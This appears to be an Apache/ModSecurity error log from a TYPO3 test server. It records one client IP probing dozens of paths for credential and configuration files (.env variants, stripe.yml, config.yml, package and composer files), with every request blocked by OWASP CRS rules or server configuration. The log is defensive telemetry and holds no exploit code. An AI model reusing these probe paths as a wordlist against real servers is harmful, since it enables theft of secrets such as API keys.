[Fri Dec 05 08:50:52.221667 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHwAAAAH4"]
[Fri Dec 05 08:50:52.243655 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHwQAAAH4"]
[Fri Dec 05 08:50:52.243902 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHwQAAAH4"]
[Fri Dec 05 08:50:52.244099 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHwQAAAH4"]
[Fri Dec 05 08:50:52.267085 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHwgAAAH4"]
[Fri Dec 05 08:50:52.267335 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHwgAAAH4"]
[Fri Dec 05 08:50:52.267568 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHwgAAAH4"]
[Fri Dec 05 08:50:52.297183 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/env/.env"] [unique_id "aTKO3CzhE94da41W-WGHwwAAAH4"]
[Fri Dec 05 08:50:52.297415 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/env/.env"] [unique_id "aTKO3CzhE94da41W-WGHwwAAAH4"]
[Fri Dec 05 08:50:52.297637 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/env/.env"] [unique_id "aTKO3CzhE94da41W-WGHwwAAAH4"]
[Fri Dec 05 08:50:52.341236 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aTKO3CzhE94da41W-WGHxAAAAH4"]
[Fri Dec 05 08:50:52.341480 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aTKO3CzhE94da41W-WGHxAAAAH4"]
[Fri Dec 05 08:50:52.341707 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aTKO3CzhE94da41W-WGHxAAAAH4"]
[Fri Dec 05 08:50:52.406572 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aTKO3CzhE94da41W-WGHxQAAAH4"]
[Fri Dec 05 08:50:52.406810 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aTKO3CzhE94da41W-WGHxQAAAH4"]
[Fri Dec 05 08:50:52.407006 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "aTKO3CzhE94da41W-WGHxQAAAH4"]
[Fri Dec 05 08:50:52.445167 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/.env"] [unique_id "aTKO3CzhE94da41W-WGHxgAAAH4"]
[Fri Dec 05 08:50:52.445412 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/.env"] [unique_id "aTKO3CzhE94da41W-WGHxgAAAH4"]
[Fri Dec 05 08:50:52.445623 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/.env"] [unique_id "aTKO3CzhE94da41W-WGHxgAAAH4"]
[Fri Dec 05 08:50:52.470394 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lambda/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aTKO3CzhE94da41W-WGHxwAAAH4"]
[Fri Dec 05 08:50:52.470662 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aTKO3CzhE94da41W-WGHxwAAAH4"]
[Fri Dec 05 08:50:52.470870 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aTKO3CzhE94da41W-WGHxwAAAH4"]
[Fri Dec 05 08:50:52.492812 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aTKO3CzhE94da41W-WGHyAAAAH4"]
[Fri Dec 05 08:50:52.493060 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aTKO3CzhE94da41W-WGHyAAAAH4"]
[Fri Dec 05 08:50:52.493251 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aTKO3CzhE94da41W-WGHyAAAAH4"]
[Fri Dec 05 08:50:52.616360 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:40420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Fri Dec 05 08:50:52.878697 2025] [authz_core:error] [pid 531696] [client 195.178.110.155:40434] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Fri Dec 05 08:50:53.965644 2025] [authz_core:error] [pid 531696] [client 195.178.110.155:40434] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/stripe.yml
[Fri Dec 05 08:50:54.083792 2025] [authz_core:error] [pid 531696] [client 195.178.110.155:40434] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/stripe.yaml
[Fri Dec 05 08:50:56.457466 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:33450] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:56.565626 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:33450] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:57.957521 2025] [authz_core:error] [pid 532219] [client 195.178.110.155:33478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:58.156413 2025] [authz_core:error] [pid 532219] [client 195.178.110.155:33478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:58.576330 2025] [authz_core:error] [pid 532219] [client 195.178.110.155:33478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yml
[Fri Dec 05 08:50:59.317065 2025] [authz_core:error] [pid 531669] [client 195.178.110.155:33490] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Fri Dec 05 08:50:59.502491 2025] [authz_core:error] [pid 531700] [client 195.178.110.155:33502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yaml
[Fri Dec 05 08:50:59.617576 2025] [authz_core:error] [pid 531700] [client 195.178.110.155:33502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:59.639291 2025] [authz_core:error] [pid 531700] [client 195.178.110.155:33502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:50:59.672992 2025] [authz_core:error] [pid 531700] [client 195.178.110.155:33502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Fri Dec 05 08:51:03.757440 2025] [:error] [pid 535953] [client 195.178.110.155:33560] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/webpack.config.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /webpack.config.js found within REQUEST_FILENAME: /webpack.config.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aTKO56gsQbwbUi5XSBYKogAAAAY"]
[Fri Dec 05 08:51:03.757736 2025] [:error] [pid 535953] [client 195.178.110.155:33560] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aTKO56gsQbwbUi5XSBYKogAAAAY"]
[Fri Dec 05 08:51:03.757960 2025] [:error] [pid 535953] [client 195.178.110.155:33560] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/webpack.config.js"] [unique_id "aTKO56gsQbwbUi5XSBYKogAAAAY"]
[Fri Dec 05 08:51:05.626818 2025] [authz_core:error] [pid 532218] [client 195.178.110.155:33564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Fri Dec 05 08:51:05.694248 2025] [authz_core:error] [pid 532218] [client 195.178.110.155:33564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Fri Dec 05 08:51:05.716291 2025] [authz_core:error] [pid 532218] [client 195.178.110.155:33564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Fri Dec 05 08:51:05.745704 2025] [authz_core:error] [pid 532218] [client 195.178.110.155:33564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Fri Dec 05 08:51:06.381136 2025] [authz_core:error] [pid 532218] [client 195.178.110.155:33564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Fri Dec 05 08:51:09.034105 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/swagger.yml
[Fri Dec 05 08:51:09.097452 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/openapi.yml
[Fri Dec 05 08:51:09.201035 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aTKO7SzhE94da41W-WGH9AAAAH4"]
[Fri Dec 05 08:51:09.201266 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aTKO7SzhE94da41W-WGH9AAAAH4"]
[Fri Dec 05 08:51:09.201501 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aTKO7SzhE94da41W-WGH9AAAAH4"]
[Fri Dec 05 08:51:09.224426 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/package-lock.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package-lock.json found within REQUEST_FILENAME: /package-lock.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aTKO7SzhE94da41W-WGH9QAAAH4"]
[Fri Dec 05 08:51:09.224658 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aTKO7SzhE94da41W-WGH9QAAAH4"]
[Fri Dec 05 08:51:09.224848 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aTKO7SzhE94da41W-WGH9QAAAH4"]
[Fri Dec 05 08:51:09.252008 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Fri Dec 05 08:51:09.275660 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.lock
[Fri Dec 05 08:51:09.451048 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aTKO7SzhE94da41W-WGH-AAAAH4"]
